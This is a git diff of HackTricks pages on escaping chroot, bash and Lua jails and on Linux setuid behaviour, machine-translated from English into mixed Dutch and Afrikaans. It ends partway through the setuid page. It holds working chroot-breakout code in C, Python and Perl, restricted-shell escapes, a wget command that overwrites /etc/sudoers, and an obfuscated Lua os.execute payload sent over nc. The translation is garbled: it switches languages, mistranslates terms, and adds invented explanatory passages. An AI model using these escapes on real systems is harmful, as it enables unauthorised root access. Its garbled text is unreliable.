-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## **GTFOBins** -**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **if you can execute any binary with "Shell" property** +**Zoek in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **of je een binair bestand kunt uitvoeren met de eigenschap "Shell"** -## Chroot Escapes +## Ontsnapping uit Chroot -From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.\ -Usually this means that to escape you need to be root inside the chroot. +Van [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): Het chroot-mechanisme is **niet bedoeld** om te beschermen tegen opzettelijke manipulatie door **bevoorrechte** (**root**) **gebruikers**. Op de meeste systemen worden chroot-contexten niet correct gestapeld en kunnen gechroote programma's **met voldoende privileges een tweede chroot uitvoeren om te ontsnappen**.\ +Meestal betekent dit dat je root moet zijn binnen de chroot om te ontsnappen. {% hint style="success" %} -The **tool** [**chw00t**](https://github.com/earthquake/chw00t) was created to abuse the following escenarios and scape from `chroot`. +De **tool** [**chw00t**](https://github.com/earthquake/chw00t) is gemaakt om misbruik te maken van de volgende scenario's en te ontsnappen uit `chroot`. {% endhint %} ### Root + CWD {% hint style="warning" %} -If you are **root** inside a chroot you **can escape** creating **another chroot**. This because 2 chroots cannot coexists (in Linux), so if you create a folder and then **create a new chroot** on that new folder being **you outside of it**, you will now be **outside of the new chroot** and therefore you will be in the FS. +Als je **root** bent binnen een chroot, kun je ontsnappen door een **andere chroot** te maken. Dit komt doordat 2 chroots niet naast elkaar kunnen bestaan (in Linux), dus als je een map maakt en vervolgens een **nieuwe chroot** maakt in die nieuwe map terwijl je **buiten de chroot** bent, bevind je je nu **buiten de nieuwe chroot** en ben je dus in het bestandssysteem. -This occurs because usually chroot DOESN'T move your working directory to the indicated one, so you can create a chroot but e outside of it. +Dit gebeurt omdat chroot meestal je werkmap niet verplaatst naar de aangegeven map, dus je kunt een chroot maken maar er buiten blijven. {% endhint %} -Usually you won't find the `chroot` binary inside a chroot jail, but you **could compile, upload and execute** a binary: +Meestal vind je het `chroot`-binair bestand niet binnen een chroot-gevangenis, maar je **kunt een binair bestand compileren, uploaden en uitvoeren**:
C: break_chroot.c - ```c #include #include @@ -50,62 +49,56 @@ Usually you won't find the `chroot` binary inside a chroot jail, but you **could int main(void) { - mkdir("chroot-dir", 0755); - chroot("chroot-dir"); - for(int i = 0; i < 1000; i++) { - chdir(".."); - } - chroot("."); - system("/bin/bash"); +mkdir("chroot-dir", 0755); +chroot("chroot-dir"); +for(int i = 0; i < 1000; i++) { +chdir(".."); +} +chroot("."); +system("/bin/bash"); } ``` -
Python - ```python #!/usr/bin/python import os os.mkdir("chroot-dir") os.chroot("chroot-dir") for i in range(1000): - os.chdir("..") +os.chdir("..") os.chroot(".") os.system("/bin/bash") ``` -
Perl - ```perl #!/usr/bin/perl mkdir "chroot-dir"; chroot "chroot-dir"; foreach my $i (0..1000) { - chdir ".." +chdir ".." } chroot "."; system("/bin/bash"); ``` -
-### Root + Saved fd +### Root + Opgeslagen fd {% hint style="warning" %} -This is similar to the previous case, but in this case the **attacker stores a file descriptor to the current directory** and then **creates the chroot in a new folder**. Finally, as he has **access** to that **FD** **outside** of the chroot, he access it and he **escapes**. +Dit is soortgelyk aan die vorige geval, maar in hierdie geval **stoor die aanvaller 'n lêerbeskrywer na die huidige gids** en skep dan die chroot in 'n nuwe gids. Uiteindelik, omdat hy **toegang** het tot daardie **FD buite** die chroot, het hy toegang daartoe en **ontsnap** hy. {% endhint %}
C: break_chroot.c - ```c #include #include @@ -115,71 +108,69 @@ This is similar to the previous case, but in this case the **attacker stores a f int main(void) { - mkdir("tmpdir", 0755); - dir_fd = open(".", O_RDONLY); - if(chroot("tmpdir")){ - perror("chroot"); - } - fchdir(dir_fd); - close(dir_fd); - for(x = 0; x < 1000; x++) chdir(".."); - chroot("."); +mkdir("tmpdir", 0755); +dir_fd = open(".", O_RDONLY); +if(chroot("tmpdir")){ +perror("chroot"); +} +fchdir(dir_fd); +close(dir_fd); +for(x = 0; x < 1000; x++) chdir(".."); +chroot("."); } ``` -
### Root + Fork + UDS (Unix Domain Sockets) {% hint style="warning" %} -FD can be passed over Unix Domain Sockets, so: +FD kan oorgedra word oor Unix Domain Sockets, so: -* Create a child process (fork) -* Create UDS so parent and child can talk -* Run chroot in child process in a different folder -* In parent proc, create a FD of a folder that is outside of new child proc chroot -* Pass to child procc that FD using the UDS -* Child process chdir to that FD, and because it's ouside of its chroot, he will escape the jail +* Skep 'n kinderproses (fork) +* Skep UDS sodat ouer en kind kan kommunikeer +* Voer chroot uit in kinderproses in 'n ander vouer +* In ouer proses, skep 'n FD van 'n vouer wat buite die nuwe kinderproses se chroot is +* Gee daardie FD aan die kinderproses deur die UDS te gebruik +* Kindproses chdir na daardie FD, en omdat dit buite sy chroot is, sal hy die tronk ontsnap {% endhint %} ### Root + Mount {% hint style="warning" %} -* Mounting root device (/) into a directory inside the chroot -* Chrooting into that directory +* Monteer die roetetoestel (/) in 'n gids binne die chroot +* Chroot in daardie gids -This is possible in Linux +Dit is moontlik in Linux {% endhint %} ### Root + /proc {% hint style="warning" %} -* Mount procfs into a directory inside the chroot (if it isn't yet) -* Look for a pid that has a different root/cwd entry, like: /proc/1/root -* Chroot into that entry +* Monteer procfs in 'n gids binne die chroot (as dit nog nie is nie) +* Soek na 'n pid wat 'n verskillende roet/cwd inskrywing het, soos: /proc/1/root +* Chroot in daardie inskrywing {% endhint %} ### Root(?) + Fork {% hint style="warning" %} -* Create a Fork (child proc) and chroot into a different folder deeper in the FS and CD on it -* From the parent process, move the folder where the child process is in a folder previous to the chroot of the children -* This children process will find himself outside of the chroot +* Skep 'n Fork (kinderproses) en chroot in 'n ander vouer dieper in die FS en CD daarop +* Vanuit die ouerproses, skuif die vouer waar die kinderproses in is na 'n vouer voor die chroot van die kinders +* Hierdie kinderproses sal homself buite die chroot vind {% endhint %} ### ptrace {% hint style="warning" %} -* Time ago users could debug its own processes from a process of itself... but this is not possible by default anymore -* Anyway, if it's possible, you could ptrace into a process and execute a shellcode inside of it ([see this example](linux-capabilities.md#cap\_sys\_ptrace)). +* 'n Tyd gelede kon gebruikers hul eie prosesse vanuit 'n proses van hulself afkamp... maar dit is nie meer standaard moontlik nie +* In elk geval, as dit moontlik is, kan jy ptrace in 'n proses doen en 'n shellcode daarin uitvoer ([sien hierdie voorbeeld](linux-capabilities.md#cap\_sys\_ptrace)). {% endhint %} -## Bash Jails +## Bash Tronke -### Enumeration - -Get info about the jail: +### Opname +Kry inligting oor die tronk: ```bash echo $SHELL echo $PATH @@ -187,105 +178,101 @@ env export pwd ``` +### Wysig PATH -### Modify PATH - -Check if you can modify the PATH env variable - +Kyk of jy die PATH-omgewingsveranderlike kan wysig. ```bash echo $PATH #See the path of the executables that you can use PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path echo /home/* #List directory ``` +### Gebruik van vim -### Using vim +Vim is 'n kragtige teksredigeerder wat gebruik kan word om lêers te wysig en te skep. Dit kan ook gebruik word as 'n hulpmiddel vir priviligie-escalasie in 'n beperkte bash-omgewing. +Om vim te gebruik, voer die volgende opdrag in die beperkte bash-omgewing in: + +```bash +vim +``` + +Dit sal vim in die beperkte omgewing aktiveer. Jy kan dan die volgende stappe volg om priviligie-escalasie te probeer: + +1. Druk die `Esc`-sleutel om in die bevelsmodus te gaan. +2. Tik `:set shell=/bin/bash` en druk `Enter` om die skulprigting van die shell te verander na die volledige bash-omgewing. +3. Tik `:shell` en druk `Enter` om 'n nuwe bash-sessie te begin met volle toegang. + +Hierdie tegniek kan gebruik word om beperkte bash-omgewings te ontsnap en toegang te verkry tot volle beheer oor die stelsel. ```bash :set shell=/bin/sh :shell ``` +### Skep skrip -### Create script - -Check if you can create an executable file with _/bin/bash_ as content - +Kyk of jy 'n uitvoerbare lêer met _/bin/bash_ as inhoud kan skep ```bash red /bin/bash > w wx/path #Write /bin/bash in a writable and executable path ``` +### Kry bash vanaf SSH -### Get bash from SSH - -If you are accessing via ssh you can use this trick to execute a bash shell: - +As jy toegang verkry via ssh, kan jy hierdie truuk gebruik om 'n bash-skulp te hardloop: ```bash ssh -t user@ bash # Get directly an interactive shell ssh user@ -t "bash --noprofile -i" ssh user@ -t "() { :; }; sh -i " ``` - -### Declare - +### Verklaar ```bash declare -n PATH; export PATH=/bin;bash -i - + BASH_CMDS[shell]=/bin/bash;shell -i ``` - ### Wget -You can overwrite for example sudoers file - +Jy kan byvoorbeeld die sudoers-lêer oorskryf. ```bash wget http://127.0.0.1:8080/sudoers -O /etc/sudoers ``` - -### Other tricks +### Ander truuks [**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\ [https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells\*\*]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ [https://gtfobins.github.io](https://gtfobins.github.io/\*\*]\(https/gtfobins.github.io)\ -**It could also be interesting the page:** +**Dit kan ook interessant wees die bladsy:** {% content-ref url="../useful-linux-commands/bypass-bash-restrictions.md" %} [bypass-bash-restrictions.md](../useful-linux-commands/bypass-bash-restrictions.md) {% endcontent-ref %} -## Python Jails +## Python Tronke -Tricks about escaping from python jails in the following page: +Truuks oor ontsnapping uit python tronke op die volgende bladsy: {% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %} [bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/) {% endcontent-ref %} -## Lua Jails +## Lua Tronke -In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base) - -**Eval with command execution:** +Op hierdie bladsy kan jy die globale funksies vind waarop jy toegang het binne lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base) +**Eval met opdrag uitvoering:** ```bash load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))() ``` - -Some tricks to **call functions of a library without using dots**: - +Sommige truuks om **funksies van 'n biblioteek te roep sonder om punte te gebruik**: ```bash print(string.char(0x41, 0x42)) print(rawget(string, "char")(0x41, 0x42)) ``` - -Enumerate functions of a library: - +Enumerasie van funksies van 'n biblioteek: ```bash for k,v in pairs(string) do print(k,v) end ``` - -Note that every time you execute the previous one liner in a **different lua environment the order of the functions change**. Therefore if you need to execute one specific function you can perform a brute force attack loading different lua environments and calling the first function of le library: - +Let wel, elke keer as jy die vorige een-regel kode in 'n **verskillende lua-omgewing uitvoer, verander die volgorde van die funksies**. Daarom, as jy 'n spesifieke funksie wil uitvoer, kan jy 'n brute force-aanval uitvoer deur verskillende lua-omgewings te laai en die eerste funksie van die le-biblioteek aan te roep: ```bash -#In this scenario you could BF the victim that is generating a new lua environment +#In this scenario you could BF the victim that is generating a new lua environment #for every interaction with the following line and when you are lucky #the char function is going to be executed for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end @@ -294,27 +281,24 @@ for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end #and "char" from string library, and the use both to execute a command for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done ``` - -**Get interactive lua shell**: If you are inside a limited lua shell you can get a new lua shell (and hopefully unlimited) calling: - +**Kry interaktiewe lua-skaal**: As jy binne 'n beperkte lua-skaal is, kan jy 'n nuwe lua-skaal (en hopelik onbeperkte) kry deur die volgende te roep: ```bash debug.debug() ``` +## Verwysings -## References - -* [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Slides: [https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)) +* [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Dia's: [https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf))
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/euid-ruid-suid.md b/linux-hardening/privilege-escalation/euid-ruid-suid.md index 78f705015..874ec5957 100644 --- a/linux-hardening/privilege-escalation/euid-ruid-suid.md +++ b/linux-hardening/privilege-escalation/euid-ruid-suid.md @@ -2,86 +2,105 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-### User Identification Variables +### Gebruikersidentifikasie Veranderlikes -- **`ruid`**: The **real user ID** denotes the user who initiated the process. -- **`euid`**: Known as the **effective user ID**, it represents the user identity utilized by the system to ascertain process privileges. Generally, `euid` mirrors `ruid`, barring instances like a SetUID binary execution, where `euid` assumes the file owner's identity, thus granting specific operational permissions. -- **`suid`**: This **saved user ID** is pivotal when a high-privilege process (typically running as root) needs to temporarily relinquish its privileges to perform certain tasks, only to later reclaim its initial elevated status. +- **`ruid`**: Die **werklike gebruikers-ID** dui die gebruiker aan wat die proses geïnisieer het. +- **`euid`**: Bekend as die **effektiewe gebruikers-ID**, verteenwoordig dit die gebruikersidentiteit wat deur die stelsel gebruik word om prosesbevoegdhede te bepaal. Gewoonlik weerspieël `euid` `ruid`, behalwe in gevalle soos 'n SetUID-binêre uitvoering, waar `euid` die identiteit van die lêereienaar aanneem en dus spesifieke bedryfsbevoegdhede verleen. +- **`suid`**: Hierdie **gebergde gebruikers-ID** is van kardinale belang wanneer 'n hoë-bevoegdheidsproses (gewoonlik as root uitgevoer) tydelik sy bevoegdhede moet opgee om sekere take uit te voer, slegs om later sy oorspronklike verhoogde status te herwin. -#### Important Note -A process not operating under root can only modify its `euid` to match the current `ruid`, `euid`, or `suid`. +#### Belangrike Nota +'n Proses wat nie as root werk nie, kan slegs sy `euid` wysig om ooreen te stem met die huidige `ruid`, `euid` of `suid`. -### Understanding set*uid Functions +### Begrip van set*uid Funksies -- **`setuid`**: Contrary to initial assumptions, `setuid` primarily modifies `euid` rather than `ruid`. Specifically, for privileged processes, it aligns `ruid`, `euid`, and `suid` with the specified user, often root, effectively solidifying these IDs due to the overriding `suid`. Detailed insights can be found in the [setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html). -- **`setreuid`** and **`setresuid`**: These functions allow for the nuanced adjustment of `ruid`, `euid`, and `suid`. However, their capabilities are contingent on the process's privilege level. For non-root processes, modifications are restricted to the current values of `ruid`, `euid`, and `suid`. In contrast, root processes or those with `CAP_SETUID` capability can assign arbitrary values to these IDs. More information can be gleaned from the [setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html) and the [setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html). +- **`setuid`**: In teenstelling met aanvanklike aannames, wysig `setuid` hoofsaaklik `euid` eerder as `ruid`. Spesifiek vir bevoorregte prosesse stem dit `ruid`, `euid` en `suid` af op die gespesifiseerde gebruiker, dikwels root, en versterk sodoende hierdie ID's as gevolg van die oorskrywing van `suid`. Gedetailleerde insigte is beskikbaar in die [setuid man-bladsy](https://man7.org/linux/man-pages/man2/setuid.2.html). +- **`setreuid`** en **`setresuid`**: Hierdie funksies maak die fynafstelling van `ruid`, `euid` en `suid` moontlik. Hul vermoëns is egter afhanklik van die bevoorregtingsvlak van die proses. Vir nie-root prosesse is wysigings beperk tot die huidige waardes van `ruid`, `euid` en `suid`. Daarenteen kan rootprosesse of dié met die `CAP_SETUID`-vermoë arbitêre waardes aan hierdie ID's toewys. Meer inligting is beskikbaar in die [setresuid man-bladsy](https://man7.org/linux/man-pages/man2/setresuid.2.html) en die [setreuid man-bladsy](https://man7.org/linux/man-pages/man2/setreuid.2.html). -These functionalities are designed not as a security mechanism but to facilitate the intended operational flow, such as when a program adopts another user's identity by altering its effective user ID. +Hierdie funksionaliteite is nie ontwerp as 'n sekuriteitsmeganisme nie, maar om die bedoelde bedryfsvloei te fasiliteer, soos wanneer 'n program 'n ander gebruiker se identiteit aanneem deur sy effektiewe gebruikers-ID te verander. -Notably, while `setuid` might be a common go-to for privilege elevation to root (since it aligns all IDs to root), differentiating between these functions is crucial for understanding and manipulating user ID behaviors in varying scenarios. +Dit is veral belangrik om te onderskei tussen hierdie funksies om gebruikers-ID-gedrag in verskillende scenario's te verstaan en te manipuleer, alhoewel `setuid` dikwels gebruik word vir bevoorregte verhoging na root (aangesien dit alle ID's op root afstem). -### Program Execution Mechanisms in Linux +### Programuitvoeringsmeganismes in Linux -#### **`execve` System Call** -- **Functionality**: `execve` initiates a program, determined by the first argument. It takes two array arguments, `argv` for arguments and `envp` for the environment. -- **Behavior**: It retains the memory space of the caller but refreshes the stack, heap, and data segments. The program's code is replaced by the new program. -- **User ID Preservation**: - - `ruid`, `euid`, and supplementary group IDs remain unaltered. - - `euid` might have nuanced changes if the new program has the SetUID bit set. - - `suid` gets updated from `euid` post-execution. -- **Documentation**: Detailed information can be found on the [`execve` man page](https://man7.org/linux/man-pages/man2/execve.2.html). +#### **`execve`-Stelseloproep** +- **Funksionaliteit**: `execve` inisieer 'n program wat bepaal word deur die eerste argument. Dit neem twee reeksargumente, `argv` vir argumente en `envp` vir die omgewing. +- **Gedrag**: Dit behou die geheue van die oproeper, maar verfris die stapel, heap en data-segmente. Die kode van die program word vervang deur die nuwe program. +- **Behoud van Gebruikers-ID**: +- `ruid`, `euid` en aanvullende groep-ID's bly onveranderd. +- `euid` kan subtiel verander as die nuwe program die SetUID-bit ingestel het. +- `suid` word na uitvoering van `euid` opgedateer. +- **Dokumentasie**: Gedetailleerde inligting is beskikbaar op die [`execve` man-bladsy](https://man7.org/linux/man-pages/man2/execve.2.html). -#### **`system` Function** -- **Functionality**: Unlike `execve`, `system` creates a child process using `fork` and executes a command within that child process using `execl`. -- **Command Execution**: Executes the command via `sh` with `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`. -- **Behavior**: As `execl` is a form of `execve`, it operates similarly but in the context of a new child process. -- **Documentation**: Further insights can be obtained from the [`system` man page](https://man7.org/linux/man-pages/man3/system.3.html). +#### **`system`-Funksie** +- **Funksionaliteit**: In teenstelling met `execve` skep `system` 'n kinderproses deur `fork` te gebruik en voer 'n opdrag binne daardie kinderproses uit met behulp van `execl`. +- **Opdraguitvoering**: Voer die opdrag uit via `sh` met `execl("/bin/sh", "sh", "-c", opdrag, (char *) NULL);`. +- **Gedrag**: Aangesien `execl` 'n vorm van `execve` is, werk dit op 'n soortgelyke manier, maar in die konteks van 'n nuwe kinderproses. +- **Dokumentasie**: Verdere insigte kan verkry word uit die [`system` man-bladsy](https://man7.org/linux/man-pages/man3/system.3.html). -#### **Behavior of `bash` and `sh` with SUID** +#### **Gedrag van `bash` en `sh` met SUID** - **`bash`**: - - Has a `-p` option influencing how `euid` and `ruid` are treated. - - Without `-p`, `bash` sets `euid` to `ruid` if they initially differ. - - With `-p`, the initial `euid` is preserved. - - More details can be found on the [`bash` man page](https://linux.die.net/man/1/bash). +- Het 'n `-p`-opsie wat beïnvloed hoe `euid` en `ruid` hanteer word. +- Sonder `-p` stel `bash` `euid` in op `ruid` as hulle aanvanklik verskil. +- Met `-p` word die aanvanklike `euid` behou. +- Meer besonderhede is beskikbaar op die [`bash` man-bladsy](https://linux.die.net/man/1/bash). - **`sh`**: - - Does not possess a mechanism similar to `-p` in `bash`. - - The behavior concerning user IDs is not explicitly mentioned, except under the `-i` option, emphasizing the preservation of `euid` and `ruid` equality. - - Additional information is available on the [`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html). +- Besit nie 'n meganisme soortgelyk aan `-p` in `bash` nie. +- Die gedrag met betrekking tot gebruikers-ID's word nie uitdruklik genoem nie, behalwe onder die `-i`-opsie, wat beklemtoon dat `euid` en `ruid` gelyk bly. +- Addisionele inligting is beskikbaar op die [`sh` man-bladsy](https://man7.org/linux/man-pages/man1/sh.1p.html). -These mechanisms, distinct in their operation, offer a versatile range of options for executing and transitioning between programs, with specific nuances in how user IDs are managed and preserved. +Hierdie meganismes, wat verskil in hul werking, bied 'n veelsydige reeks opsies vir die uitvoering en oorgang tussen programme, met spesifieke subtiliteite in hoe gebruikers-ID's bestuur en behou word. -### Testing User ID Behaviors in Executions +### Toetsing van Gebruikers-ID-Gedrag in Uitvoerings -Examples taken from https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, check it for further information +Voorbeelde geneem vanaf https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, kyk dit vir verdere inligting -#### Case 1: Using `setuid` with `system` +#### Geval 1: Gebruik van `setuid` met `system` -**Objective**: Understanding the effect of `setuid` in combination with `system` and `bash` as `sh`. +**Doel**: Begrip van die effek van `setuid` in kombinasie met `system` en `bash` as `sh`. -**C Code**: +**C-kode**: ```c #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - system("id"); - return 0; +setuid(1000); +system("id"); +return 0; } ``` +**Samelewing en Toestemmings:** -**Compilation and Permissions:** +Wanneer jy 'n program op Linux samestel, word 'n uitvoerbare lêer geskep wat die program se kode bevat. Hierdie uitvoerbare lêer het spesifieke toestemmings wat bepaal wie die program kan uitvoer, wysig of lees. + +Die toestemmings van 'n lêer kan gesien word deur die `ls -l` opdrag uit te voer. Die uitset sal iets soos die volgende wees: + +``` +-rwxr-xr-x 1 user group 12345 Jan 1 00:00 program +``` + +Die eerste karakter in die uitset (`-` in hierdie geval) dui aan dat dit 'n lêer is. As dit 'n `d` was, sou dit 'n gids wees. Die volgende drie karakters (`rwx`) dui die toestemmings van die eienaar van die lêer aan, die volgende drie karakters (`r-x`) dui die toestemmings van die groep aan, en die laaste drie karakters (`r-x`) dui die toestemmings van ander gebruikers aan. + +Elke karakter in die toestemmingsreeks verteenwoordig 'n spesifieke toestemming: + +- `r` dui aan dat die lêer gelees kan word. +- `w` dui aan dat die lêer gewysig kan word. +- `x` dui aan dat die lêer uitgevoer kan word. + +Om die toestemmings van 'n lêer te verander, kan die `chmod` opdrag gebruik word. Byvoorbeeld, `chmod +x program` sal die uitvoerbare toestemming aan die lêer toevoeg. + +Dit is belangrik om die toestemmings van jou lêers korrek te konfigureer om die veiligheid van jou Linux-stelsel te verseker. ```bash oxdf@hacky$ gcc a.c -o /mnt/nfsshare/a; oxdf@hacky$ chmod 4755 /mnt/nfsshare/a @@ -91,133 +110,136 @@ oxdf@hacky$ chmod 4755 /mnt/nfsshare/a bash-4.2$ $ ./a uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** +* `ruid` en `euid` begin as 99 (niemand) en 1000 (frank) onderskeidelik. +* `setuid` pas beide aan na 1000. +* `system` voer `/bin/bash -c id` uit as gevolg van die simboliese skakel van sh na bash. +* `bash`, sonder `-p`, pas `euid` aan om ooreen te stem met `ruid`, wat beteken dat beide 99 (niemand) is. -* `ruid` and `euid` start as 99 (nobody) and 1000 (frank) respectively. -* `setuid` aligns both to 1000. -* `system` executes `/bin/bash -c id` due to the symlink from sh to bash. -* `bash`, without `-p`, adjusts `euid` to match `ruid`, resulting in both being 99 (nobody). +#### Geval 2: Gebruik van setreuid met system -#### Case 2: Using setreuid with system - -**C Code**: +**C-kode**: ```c #define _GNU_SOURCE #include #include int main(void) { - setreuid(1000, 1000); - system("id"); - return 0; +setreuid(1000, 1000); +system("id"); +return 0; } ``` +**Samelewing en 